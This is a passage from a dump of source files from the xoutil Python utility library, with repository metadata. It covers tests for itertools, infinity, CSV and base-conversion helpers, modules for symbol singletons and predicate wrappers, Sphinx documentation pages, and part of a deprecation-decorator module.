xoutil.future.collections import Counter\n\n res = delete_duplicates(l)\n assert type(l) is type(res) # noqa\n assert len(res) <= len(l)\n assert all(Counter(res)[item] == 1 for item in l)\n\n\n@given(s.lists(s.integers(), max_size=30))\ndef test_delete_duplicates_with_key(l):\n from xoutil.future.itertools import delete_duplicates\n\n res = delete_duplicates(l, key=lambda x: x % 3)\n assert len(res) <= 3, \"key yields 0, 1, or 2; thus res can contain at most 3 items\"\n\n\ndef test_iter_delete_duplicates():\n from xoutil.future.itertools import iter_delete_duplicates\n\n assert list(iter_delete_duplicates(\"AAAaBBBA\")) == [\"A\", \"a\", \"B\", \"A\"]\n assert list(iter_delete_duplicates(\"AAAaBBBA\", key=lambda x: x.lower())) == [\n \"A\",\n \"B\",\n \"A\",\n ]\n\n\n@given(\n s.lists(s.integers(), max_size=30),\n s.lists(s.integers(), max_size=30),\n s.lists(s.integers(), max_size=30),\n)\ndef test_merge(l1, l2, l3):\n from xoutil.future.itertools import merge\n\n l1 = sorted(l1)\n l2 = sorted(l2)\n l3 = sorted(l3)\n # Accumulate and catch if yielding more than necessary\n iter_ = merge(l1, l2, l3)\n expected = sorted(l1 + l2 + l3)\n result = []\n for _ in range(len(expected)):\n result.append(next(iter_))\n with pytest.raises(StopIteration):\n last = next(iter_) # noqa: There cannot be more items in the merge\n assert result == expected\n\n\n@given(s.lists(s.integers(), max_size=30), s.lists(s.integers(), max_size=30))\ndef test_merge_by_key(l1, l2):\n from xoutil.future.itertools import merge\n\n l1 = [(\"l1-dummy\", i) for i in sorted(l1)]\n l2 = [(\"l2-dummy\", i) for i in sorted(l2)]\n # Accumulate and catch if yielding more than necessary\n iter_ = merge(l1, l2, key=lambda x: x[1])\n expected = sorted(l1 + l2, key=lambda x: x[1])\n result = []\n for _ in range(len(expected)):\n result.append(next(iter_))\n with pytest.raises(StopIteration):\n last = next(iter_) # noqa: There cannot be more items in the merge\n assert result == 
expected\n\n\n@given(s.lists(s.integers(), max_size=30), s.lists(s.integers(), max_size=30))\ndef test_merge_by_key_incomparable(l1, l2):\n class item:\n def __init__(self, x):\n self.item = x\n\n from xoutil.future.itertools import merge\n\n l1 = [item(i) for i in sorted(l1)]\n l2 = [item(i) for i in sorted(l2)]\n # Accumulate and catch if yielding more than necessary\n iter_ = merge(l1, l2, key=lambda x: x.item)\n expected = sorted(l1 + l2, key=lambda x: x.item)\n result = []\n for _ in range(len(expected)):\n result.append(next(iter_))\n with pytest.raises(StopIteration):\n last = next(iter_) # noqa: There cannot be more items in the merge\n assert result == expected\n" }, { "alpha_fraction": 0.542434811592102, "alphanum_fraction": 0.5437062978744507, "avg_line_length": 28.129629135131836, "blob_id": "971182bb5cd3f8965fc936fd1910d0214aaa29ea", "content_id": "e78c5837f59a2e028ea9b1820a34ea92e19a0383", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6293, "license_type": "no_license", "max_line_length": 80, "num_lines": 216, "path": "/xotl/tools/symbols.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Special logical values like Unset, Undefined, Ignored, Invalid, ...\n\nAll values only could be `True` or `False` but are intended in places where\n`None` is expected to be a valid value or for special Boolean formats.\n\n\"\"\"\n\n\nSYMBOL = \"symbol\"\nBOOLEAN = \"boolean\"\n\nTIMEOUT = 2.0\n\n\nclass MetaSymbol(type):\n \"\"\"Meta-class for symbol types.\"\"\"\n\n def __new__(cls, name, bases, ns):\n if ns[\"__module__\"] == __name__ or name not in {SYMBOL, BOOLEAN}:\n self = 
super().__new__(cls, name, bases, ns)\n if name == SYMBOL:\n self._instances = {str(v): v for v in (False, True)}\n return self\n else:\n raise TypeError(\n 'invalid class \"{}\" declared outside of \"{}\" '\n \"module\".format(name, __name__)\n )\n\n def __instancecheck__(self, instance):\n \"\"\"Override for isinstance(instance, self).\"\"\"\n if instance is False or instance is True:\n return True\n else:\n return super().__instancecheck__(instance)\n\n def __subclasscheck__(self, subclass):\n \"\"\"Override for issubclass(subclass, self).\"\"\"\n if subclass is bool:\n return True\n else:\n return super().__subclasscheck__(subclass)\n\n def nameof(self, s):\n \"\"\"Get the name of a symbol instance (`s`).\"\"\"\n items = self._instances.items()\n return next((name for name, value in items if value is s), None)\n\n def parse(self, name):\n \"\"\"Returns instance from a string.\n\n Standard Python Boolean values are parsed too.\n\n \"\"\"\n if \"#\" in name: # Remove comment\n name = name.split(\"#\")[0].strip()\n res = self._instances.get(name, None)\n if res is not None:\n if isinstance(res, self):\n return res\n else:\n msg = 'invalid parsed value \"{}\" of type \"{}\"; must be \"{}\"'\n rtn, sn = type(res).__name__, self.__name__\n raise TypeError(msg.format(res, rtn, sn))\n else:\n msg = 'name \"{}\" is not defined'\n raise NameError(msg.format(name))\n\n\nclass symbol(int, metaclass=MetaSymbol):\n \"\"\"Instances are custom symbols.\n\n Symbol instances identify uniquely a semantic concept by its name. Each\n one has an ordinal value associated.\n\n For example::\n\n >>> ONE2MANY = symbol('ONE2MANY')\n >>> ONE_TO_MANY = symbol('ONE2MANY')\n\n >>> ONE_TO_MANY is ONE2MANY\n True\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, name, value=None):\n \"\"\"Get or create a new symbol instance.\n\n :param name: String representing the internal name. `Symbol`:class:\n instances are unique (singletons) in the context of this\n argument. 
``#`` and spaces are invalid characters to allow\n comments.\n\n :param value: Any value compatible with Python `bool` or `int` types.\n `None` is used as a special value to create a value using the\n name hash.\n\n \"\"\"\n from sys import intern as unique\n\n name = unique(name)\n if name:\n if value is None:\n value = hash(name)\n res = cls._instances.get(name)\n if res is None: # Create the new instance\n if isinstance(value, int):\n res = super().__new__(cls, value)\n cls._instances[name] = res\n else:\n msg = (\n 'instancing \"{}\" with name \"{}\" and incorrect '\n 'value \"{}\" of type \"{}\"'\n )\n cn, vt = cls.__name__, type(value).__name__\n raise TypeError(msg.format(cn, name, value, vt))\n elif res != value: # Check existing instance\n msg = 'value \"{}\" mismatch for existing instance: \"{}\"'\n raise ValueError(msg.format(value, name))\n return res\n else:\n raise ValueError(\"name must be a valid non empty string\")\n\n def __init__(self, *args, **kwds):\n pass\n\n def __repr__(self):\n return symbol.nameof(self)\n\n __str__ = __repr__\n\n\nclass boolean(symbol):\n \"\"\"Instances are custom logical values (`True` or `False`).\n\n Special symbols allowing only logical (False or True) values.\n\n For example::\n\n >>> true = boolean('true', True)\n >>> false = boolean('false')\n >>> none = boolean('false')\n >>> unset = boolean('unset')\n\n >>> class X:\n ... 
attr = None\n\n >>> getattr(X(), 'attr') is not None\n False\n\n >>> getattr(X(), 'attr', false) is not false\n True\n\n >>> none is false\n True\n\n >>> false == False\n True\n\n >>> false == unset\n True\n\n >>> false is unset\n False\n\n >>> true == True\n True\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, name, value=False):\n \"\"\"Get or create a new symbol instance.\n\n See `~Symbol.__new__`:meth: for information about parameters.\n \"\"\"\n return super().__new__(cls, name, bool(value))\n\n def __getnewargs__(self):\n cls = type(self)\n name = next((key for key, obj in cls._instances.items() if obj is self))\n return (name, bool(self))\n\n\n# --- Special singleton values ---\n\n#: False value, mainly for function parameter definitions, where None could\n#: be a valid value.\nUnset = boolean(\"Unset\")\n\n#: False value for local scope use or where ``Unset`` could be a valid value\nUndefined = boolean(\"Undefined\")\n\n#: To be used in arguments that are currently ignored because they are being\n#: deprecated. 
The only valid reason to use `Ignored` is to signal ignored\n#: arguments in method's/function's signature\nIgnored = boolean(\"Ignored\")\n\n#: To be used in functions resulting in a fail where False could be a valid\n#: value.\nInvalid = boolean(\"Invalid\")\n\n#: To be used as a mark for current context as a mechanism of comfort.\nThis = boolean(\"This\", True)\n" }, { "alpha_fraction": 0.6041984558105469, "alphanum_fraction": 0.6085878014564514, "avg_line_length": 31.345678329467773, "blob_id": "154b66f5eb2cf8194f668ad2a265255f89cc1966", "content_id": "63e7bc8cb745470c2c05114867f818103fdac9c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5241, "license_type": "no_license", "max_line_length": 78, "num_lines": 162, "path": "/xotl/tools/fp/prove/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Validity proofs for data values.\n\nThere are some basic helper functions:\n\n- `predicative`:func: wraps a function in a way that a logical false value is\n returned on failure. If an exception is raised, it is returned wrapped as\n an special false value. See `~xotl.tools.fp.option.Maybe`:class: monad for\n more information.\n\n- `vouch`:func: wraps a function in a way that an exception is raised if\n an invalid value (logical false by default) is returned. This is useful to\n call functions that use \"special\" false values to signal a failure.\n\n- `enfold`:func: creates a decorator to convert a function to use either the\n `predicative`:func: or the `vouch`:func: protocol.\n\n.. 
versionadded:: 1.8.0\n\n\"\"\"\n\n\ndef predicative(function, *args, **kwds):\n \"\"\"Call a function in a safety wrapper returning a false value if fail.\n\n This converts any function into a predicate. A predicate can be thought\n as an operator or function that returns a value that is either true or\n false.\n\n Predicates are sometimes used to indicate set membership: on certain\n occasions it is inconvenient or impossible to describe a set by listing\n all of its elements. Thus, a predicate ``P(x)`` will be true or false,\n depending on whether x belongs to a set.\n\n If the argument `function` validates its arguments, return a valid true\n value. There are two special conditions: first, a value treated as false\n for Python conventions (for example, ``0``, or an empty string); and\n second, when an exception is raised; in both cases the predicate will\n return an instance of `~xotl.tools.fp.option.Maybe`:class:.\n\n \"\"\"\n from xotl.tools.symbols import boolean\n from xotl.tools.fp.option import Maybe, Just, Wrong\n from xotl.tools.params import single\n\n # I don't understand anymore why a single argument must be a special case,\n # maybe because the composition problem.\n is_single = single(*args, **kwds)\n try:\n res = function(*args, **kwds)\n if isinstance(res, (boolean, Maybe)):\n if isinstance(res, Just) and res.inner:\n return res.inner\n elif isinstance(res, boolean) and is_single and args[0]:\n return args\n else:\n return res\n elif res:\n return res\n else:\n return Just(res)\n except Exception as error:\n if isinstance(error, ValueError) and is_single:\n return Wrong(args[0])\n else:\n return Wrong(error)\n\n\ndef vouch(function, *args, **kwds):\n \"\"\"Call a function in a safety wrapper raising an exception if it fails.\n\n When the wrapped function fails, an exception must be raised. A predicate\n fails when it returns a false value. 
To avoid treat false values of some\n types as fails, use `Just`:class: to return that values wrapped.\n\n \"\"\"\n from xotl.tools.symbols import boolean, Invalid\n from xotl.tools.clipping import small\n from xotl.tools.fp.option import Just, Wrong\n from xotl.tools.params import single\n\n res = function(*args, **kwds)\n if isinstance(res, boolean):\n if res:\n aux = single(*args, **kwds)\n if aux is not Invalid:\n res = aux\n else:\n msg = \"{}() validates as false\".format(small(function))\n raise TypeError(msg)\n elif isinstance(res, Wrong):\n inner = res.inner\n if isinstance(inner, BaseException):\n raise inner\n else:\n msg = \"{}() validates as a wrong value\".format(small(function))\n if inner is not None or not isinstance(inner, boolean):\n v, t = small(inner), type(inner).__name__\n msg += ' {} of type \"{}\"'.format(v, t)\n raise TypeError(msg)\n elif isinstance(res, Just):\n res = res.inner\n return res\n\n\ndef enfold(checker):\n \"\"\"Create a decorator to execute a function inner a safety wrapper.\n\n :param checker: Could be any function to enfold, but it's intended mainly\n for `predicative`:func: or `vouch`:func: functions.\n\n In the following example, the semantics of this function can be seen. The\n definition::\n\n >>> @enfold(predicative)\n ... def test(x):\n ... return 1 <= x <= 10\n\n >>> test(5)\n 5\n\n It is equivalent to::\n\n >>> def test(x):\n ... return 1 <= x <= 10\n\n >>> predicative(test, 5)\n 5\n\n In other hand::\n\n >>> @enfold(predicative)\n ... def test(x):\n ... 
return 1 <= x <= 10\n\n >>> test(15)\n 5\n\n \"\"\"\n\n def wrapper(func):\n def inner(*args, **kwds):\n return checker(func, *args, **kwds)\n\n try:\n inner.__name__ = func.__name__\n inner.__doc__ = func.__doc__\n except Exception:\n from xotl.tools.clipping import small\n\n inner.__name__ = str(small(func))\n return inner\n\n return wrapper\n" }, { "alpha_fraction": 0.6437894701957703, "alphanum_fraction": 0.6463158130645752, "avg_line_length": 32.45070266723633, "blob_id": "d4e9f915f03459ca677d286557dbce214b08d4f6", "content_id": "14deeb5db3ace5a78699cc0e3c9f84ae1b26c2d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2377, "license_type": "no_license", "max_line_length": 78, "num_lines": 71, "path": "/xotl/tools/future/csv.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"CSV parsing and writing extensions.\n\nThis module is an extension of `csv`:mod: Python standard module, it provides\nclasses and tools that assist in the reading and writing of `Comma Separated\nValue (CSV)`:abbr: files, and implements the interface described by PEP\n`305`:pep:.\n\n\"\"\"\n\n\nfrom csv import * # noqa\nfrom csv import unix_dialect\nimport csv as _stdlib # noqa\n\n\n#: Define 'unix dialect' as our base default for inheritance.\nDefaultDialect = unix_dialect\n\nreader = _stdlib.reader\n\n\ndef parse(data, *dialect, **options):\n r\"\"\"Parse `data` into a sheet.\n\n This function has the exact parameters protocol as `~csv.reader`:func:\\ ::\n\n parse(data [, dialect='excel'] [, optional keyword options])\n\n :param data: Can be any object that returns a line of input for each\n iteration, such as a 
file object or a list.\n\n :param dialect: An optional parameter can be given which is used to define\n a set of parameters specific to a particular CSV dialect. It may\n be an instance of a subclass of the `~csv.Dialect`:class: class or\n one of the strings returned by the `~csv.list_dialects`:func:\n function.\n\n The other optional keyword arguments can be given to override\n individual formatting parameters in the current `dialect`.\n\n When reading a value, `csv`:mod: for Python version 2 doesn't accept\n unicode text, so given data lines are forced to be `str`:class: values\n before processed by `~csv.reader`:func:. Each cell is converted to\n unicode text after read.\n\n :returns: The parsed matrix.\n\n A short usage example::\n\n >>> from xotl.tools.future import csv\n >>> with open('test.csv', newline='') as data:\n ... matrix = csv.parse(data)\n ... for row in matrix:\n ... print(', '.join(row))\n Last name, First Name\n van Rossum, Guido\n Stallman, Richard\n\n \"\"\"\n string_force = text_force = str # They were different in Python 2.\n rows = reader((string_force(line) for line in data), *dialect, **options)\n return [[text_force(cell) for cell in row] for row in rows]\n" }, { "alpha_fraction": 0.6468842625617981, "alphanum_fraction": 0.6498516201972961, "avg_line_length": 24.274999618530273, "blob_id": "b473355338830d02be55d316ed413fadc54159a6", "content_id": "3784e081340b2e9bb0bcdd064d74a9681e97e065", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1012, "license_type": "no_license", "max_line_length": 72, "num_lines": 40, "path": "/tests/test_infinity.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file 
allows you to.\n#\nimport pickle\nfrom hypothesis import given, strategies as s\nfrom xoutil.infinity import Infinity, InfinityType\n\n\n@given(s.floats() | s.integers())\ndef test_comparable_with_numbers(x):\n assert -Infinity < x < Infinity\n\n\n@given(s.dates() | s.datetimes())\ndef test_comparable_with_dates(x):\n assert -Infinity < x < Infinity\n\n\ndef test_infinity_hashable():\n hash(Infinity)\n hash(-Infinity)\n\n\ndef test_singleton():\n assert Infinity is InfinityType(+1)\n assert -Infinity is InfinityType(-1)\n\n\n@given(\n s.sampled_from([Infinity, -Infinity]),\n s.sampled_from([pickle.HIGHEST_PROTOCOL, pickle.DEFAULT_PROTOCOL]),\n)\ndef test_pickable(inf, proto):\n serialized = pickle.dumps(inf, proto)\n assert inf is pickle.loads(serialized)\n" }, { "alpha_fraction": 0.6978371739387512, "alphanum_fraction": 0.6997455358505249, "avg_line_length": 30.440000534057617, "blob_id": "e2400d6a63f26f20a1476cc21c8de0caad974b23", "content_id": "46aebfc2a0a0f77fa3c91cebc0c04e22cd47d7a8", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1572, "license_type": "permissive", "max_line_length": 91, "num_lines": 50, "path": "/docs/source/xotl.tools/objects.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.objects`:mod: - Functions for dealing with objects\n==============================================================\n\n.. automodule:: xotl.tools.objects\n :members: validate_attrs, iterate_over, smart_getter,\n\t smart_getter_and_deleter, popattr, setdefaultattr, copy_class,\n\t fulldir, classproperty, import_object\n\n.. autofunction:: get_first_of(sources, *keys, default=None, pred=None)\n\n.. autofunction:: xdir(obj, filter=None, attr_filter=None, value_filter=None, getattr=None)\n\n.. autofunction:: fdir(obj, filter=None, attr_filter=None, value_filter=None, getattr=None)\n\n.. 
autofunction:: smart_copy(*sources, target, *, defaults=False)\n\n.. autofunction:: extract_attrs(obj, *names, default=Unset)\n\n.. autofunction:: traverse(obj, path, default=Unset, sep='.', getter=None)\n\n.. autofunction:: get_traverser(*paths, default=Unset, sep='.', getter=None)\n\n.. autofunction:: dict_merge(*dicts, **other)\n\n.. autofunction:: pop_first_of(source, *keys, default=None)\n\n.. autofunction:: fix_method_documentation\n\n.. autofunction:: multi_getter\n\n.. autofunction:: get_branch_subclasses\n\n.. autofunction:: iter_final_subclasses\n\n.. autofunction:: get_final_subclasses\n\n.. autofunction:: FinalSubclassEnumeration\n\n.. autofunction:: save_attributes(obj, *attributes, getter=None, setter=None)\n\n.. autofunction:: temp_attributes(obj, attrs, getter=None, setter=None)\n\n.. autoclass:: memoized_property\n :members: reset\n\n .. versionadded:: 1.8.1 Ported from ``xoutil.decorator.memoized_property``.\n\n.. autofunction:: delegator\n\n.. autoclass:: DelegatedAttribute\n" }, { "alpha_fraction": 0.6893819570541382, "alphanum_fraction": 0.6965134739875793, "avg_line_length": 37.24242401123047, "blob_id": "84273d4cc0d03af855c979bbbd2be49032116439", "content_id": "1d574784e1f0e75b0baff04acf4aa17145a6884d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1262, "license_type": "permissive", "max_line_length": 77, "num_lines": 33, "path": "/docs/source/xotl.tools/context.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.context`:mod: - Simple execution contexts\n=====================================================\n\n.. automodule:: xotl.tools.context\n :members: context, Context\n\n\n.. _context-greenlets:\n\n.. 
note:: About thread-locals and contexts.\n\n The `context`:class: uses internally a `thread-local\n <threading.local>`:class: instance to keep context stacks in different\n threads from seeing each other.\n\n If, when this module is imported, `greenlet`:mod: is **imported** already,\n greenlet isolation is also warranted (which implies thread isolation).\n\n If you use collaborative multi-tasking based in other framework other than\n `greenlet`, you must ensure to monkey patch the `threading.local` class so\n that isolation is kept.\n\n In future releases of xotl.tools, we plan to provide a way to inject a\n \"process\" identity manager so that other frameworks be easily integrated.\n\n .. versionchanged:: 1.7.1 Changed the test about ``greenlet``. Instead of\n testing for `greenlet` to be importable, test it is imported already.\n\n .. versionchanged:: 1.6.9 Added direct greenlet isolation and removed the\n need for `gevent.local`:mod:.\n\n .. versionadded:: 1.6.8 Uses `gevent.local`:mod: if available to isolate\n greenlets.\n" }, { "alpha_fraction": 0.6857143044471741, "alphanum_fraction": 0.6857143044471741, "avg_line_length": 69, "blob_id": "8e90a590c58481f75623c1d42990b7d0d8bda7b1", "content_id": "626bd8bcc187374bc89c2f73ea055752dfb92ada", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 70, "license_type": "permissive", "max_line_length": 69, "num_lines": 1, "path": "/docs/source/history/changes-1.2.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Bug fixes in `!xoutil.proxy`:mod: and `!xoutil.aop.classical`:mod:.\n" }, { "alpha_fraction": 0.449664443731308, "alphanum_fraction": 0.449664443731308, "avg_line_length": 28.799999237060547, "blob_id": "7b91a22700b51621640dcd15e2db58a9d4791a70", "content_id": "80c539f3292b9e654fb14df650daeafe0d60cf45", "detected_licenses": [ "Python-2.0", 
"LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 149, "license_type": "permissive", "max_line_length": 51, "num_lines": 5, "path": "/docs/source/xotl.tools/web.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.web`:mod: -- Utils for Web applications\n===================================================\n\n.. automodule:: xotl.tools.web\n :members:\n" }, { "alpha_fraction": 0.4659763276576996, "alphanum_fraction": 0.48594674468040466, "avg_line_length": 26.040000915527344, "blob_id": "57b8c3fedd1b0c96ce479dc69e2bad06da50d97a", "content_id": "fcfd75eceb4fabb143bb4906cd6b7c97fb68404f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 73, "num_lines": 50, "path": "/tests/test_csv.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\ndef test_csv():\n from xoutil.future.csv import parse, DefaultDialect\n\n data = [\n \"A,B,C,D\",\n \"1,1.2,1.3,Spanish\",\n \"2,2.2,2.3,Español\",\n '''\"One, comma\",\"\"\"double quotes\"\"\",I'm a single quote,Inglés''',\n ]\n\n def forge(cell):\n try:\n return int(cell)\n except ValueError:\n try:\n return float(cell)\n except ValueError:\n return cell\n\n matrix = [[forge(cell) for cell in row] for row in parse(data)]\n\n sum_int, sum_float = 0, 0.0\n count_int, count_float, count_text = 0, 0, 0\n for row in matrix:\n for cell in row:\n if isinstance(cell, int):\n count_int += 1\n sum_int += cell\n elif isinstance(cell, float):\n count_float += 1\n sum_float += cell\n else:\n 
assert isinstance(cell, str)\n count_text += 1\n\n assert count_int == 2\n assert sum_int == 3\n assert sum_float == 7.0\n assert count_float == 4\n assert count_text == 10\n" }, { "alpha_fraction": 0.545141875743866, "alphanum_fraction": 0.6371453404426575, "avg_line_length": 30.432432174682617, "blob_id": "8287b94a7eb8187cfefb5269ba906c43da39f388", "content_id": "44a84acb75178600d518edc4573d50dfa29205bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1164, "license_type": "no_license", "max_line_length": 86, "num_lines": 37, "path": "/tests/test_bases.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\nimport random\n\nfrom xoutil.bases import B32, B64, B64symbolic\n\n\ndef build_many_tests():\n def test_many_random_convertions(self):\n subjects = [B32, B64, B64symbolic]\n for _ in range(5):\n testcase = random.randrange(2 ** 64, 2 ** 128)\n subject = random.choice(subjects)\n assert testcase == subject.basetoint(subject.inttobase(testcase))\n\n return {\n \"test_many_random_convertions_%d\" % i: test_many_random_convertions\n for i in range(10)\n }\n\n\n_TestManyConvertions = type(str(\"TestManyConvertions\"), (object,), build_many_tests())\n\n\nclass TestManyConvertions(unittest.TestCase, _TestManyConvertions):\n def test_regression_56107046767814579580835126010035242071(self):\n number = 56107046767814579580835126010035242071\n b64 = B64symbolic\n assert number == b64.basetoint(b64.inttobase(number))\n" }, { "alpha_fraction": 0.5890254378318787, "alphanum_fraction": 0.5911075472831726, "avg_line_length": 33.07093811035156, "blob_id": 
"3923f12d27df3b970b4e61fe6182b8cb87b10f0e", "content_id": "6a5b42bd768a6383ca76a94492dc0e0ccdd4b1dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14892, "license_type": "no_license", "max_line_length": 88, "num_lines": 437, "path": "/xotl/tools/deprecation.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport types\nimport warnings\n\nfrom functools import wraps\n\n\n# TODO: Invalidate this module in favor of new 'xotl.tools.suggest' when\n# implemented\n\n# FIX: 'warnings.warn' uses in this module 'UserWarning' instead of\n# 'DeprecationWarning'. There is a way to signal the warning with the correct\n# type.\n\nDEFAULT_MSG = (\n \"{funcname} is now deprecated and it will be \"\n \"removed{in_version}. Use {replacement} instead.\"\n)\n\n\nclass DeprecationError(Exception):\n pass\n\n\n# TODO: Use ``warnings.simplefilter('default', DeprecationWarning)``\n\n\n# TODO: Maybe adapt all other functions in this module to use this descriptor.\n# Currently, it's only being used in combination with\n# xotl.tools.modules.customize to deprecate imports from xotl.tools top level\n# module.\nclass DeprecatedImportDescriptor:\n \"A descriptor that issues a deprecation warning when resolving `name`.\"\n\n def __init__(self, replacement):\n self.attr = replacement[replacement.rfind(\".\") + 1 :]\n self.replacement = replacement\n\n def __get__(self, instance, owner):\n if instance is not None:\n import warnings\n from xotl.tools.objects import import_object\n\n result = import_object(self.replacement)\n warnings.warn(\n \"Importing {name} from xotl.tools is deprecated. 
\"\n \"You should import it from {ns}\".format(\n name=self.attr, ns=self.replacement\n ),\n UserWarning, # DeprecationWarning is silent in ipython\n )\n return result\n else:\n return self\n\n\ndef _nameof(item):\n \"Version of `xotl.tools.names.nameof`:func: to avoid importing it here.\"\n singletons = (None, True, False, Ellipsis, NotImplemented)\n res = next((str(s) for s in singletons if s is item), None)\n if res is None:\n res = \".\".join([item.__module__, item.__name__])\n return res\n\n\ndef deprecated(\n replacement,\n msg=DEFAULT_MSG,\n deprecated_module=None,\n removed_in_version=None,\n check_version=False,\n new_name=None,\n):\n \"\"\"Small decorator for deprecated functions.\n\n Usage::\n\n @deprecated(new_function)\n def deprecated_function(...):\n ...\n\n :param replacement: Either a string or the object that replaces the\n deprecated.\n\n :param msg: A deprecation warning message template. You should provide\n keyword arguments for the `format`:func: function. Currently we pass\n the current keyword arguments: `replacement` (after some processing),\n `funcname` with the name of the currently deprecated object and\n `in_version` with the version this object is going to be removed if\n `removed_in_version` argument is not None.\n\n Defaults to: \"{funcname} is now deprecated and it will be\n removed{in_version}. Use {replacement} instead.\"\n\n :param removed_in_version: The version the deprecated object is going to be\n removed.\n\n :param check_version: If True and `removed_in_version` is not None, then\n declarations of obseleted objects will raise a DeprecationError. This\n helps the release manager to keep the release clean.\n\n .. note:: Currently only works with setuptools' installed distributions.\n\n :param deprecated_module: If provided, the name of the module the\n deprecated object resides. Not needed if the deprecated object is a\n function or class.\n\n :param new_name: If provided, it's used as the name of the\n deprecated object. 
Needed to allow renaming in\n `import_deprecated`:func: helper function.\n\n .. note:: Deprecating some classes in Python 3 could fail. This is\n because those classes do not declare a '__new__' par of the declared\n '__init__'. The problem is solved if the '__new__' of the super-class\n has no arguments. This doesn't happen in Python 2.\n\n To solve these cases mark the deprecation in a comment and issue the\n warning directly in the constructor code.\n\n .. versionchanged:: 1.4.1 Introduces removed_in_version and check_version.\n\n \"\"\"\n\n def raise_if_deprecated(target, target_version):\n import pkg_resources\n\n pkg = _nameof(target)\n pkg, _obj = pkg.rsplit(\".\", 1)\n dist = None\n while not dist and pkg:\n try:\n dist = pkg_resources.get_distribution(pkg)\n except pkg_resources.DistributionNotFound:\n dist = None\n if \".\" in pkg:\n pkg, _obj = pkg.rsplit(\".\", 1)\n else:\n pkg, _obj = None, None # noqa\n assert dist\n if isinstance(target_version, str):\n target_version = pkg_resources.parse_version(target_version)\n if dist.parsed_version >= target_version:\n msg = (\n \"A deprecated feature %r was scheduled to be \"\n \"removed in version %r and it is still \"\n \"alive in %r!\"\n % (_nameof(target), str(removed_in_version), str(dist.version))\n )\n raise DeprecationError(msg)\n\n def decorator(target):\n target_name = new_name if new_name else target.__name__\n if deprecated_module:\n funcname = deprecated_module + \".\" + target_name\n else:\n funcname = target_name\n if isinstance(replacement, (type, types.FunctionType)):\n repl_name = replacement.__module__ + \".\" + replacement.__name__\n else:\n repl_name = replacement\n if removed_in_version:\n in_version = \" in version \" + removed_in_version\n else:\n in_version = \"\"\n if isinstance(target, type):\n\n def new(*args, **kwargs):\n if check_version and removed_in_version:\n raise_if_deprecated(target, removed_in_version)\n warnings.warn(\n msg.format(\n funcname=funcname, 
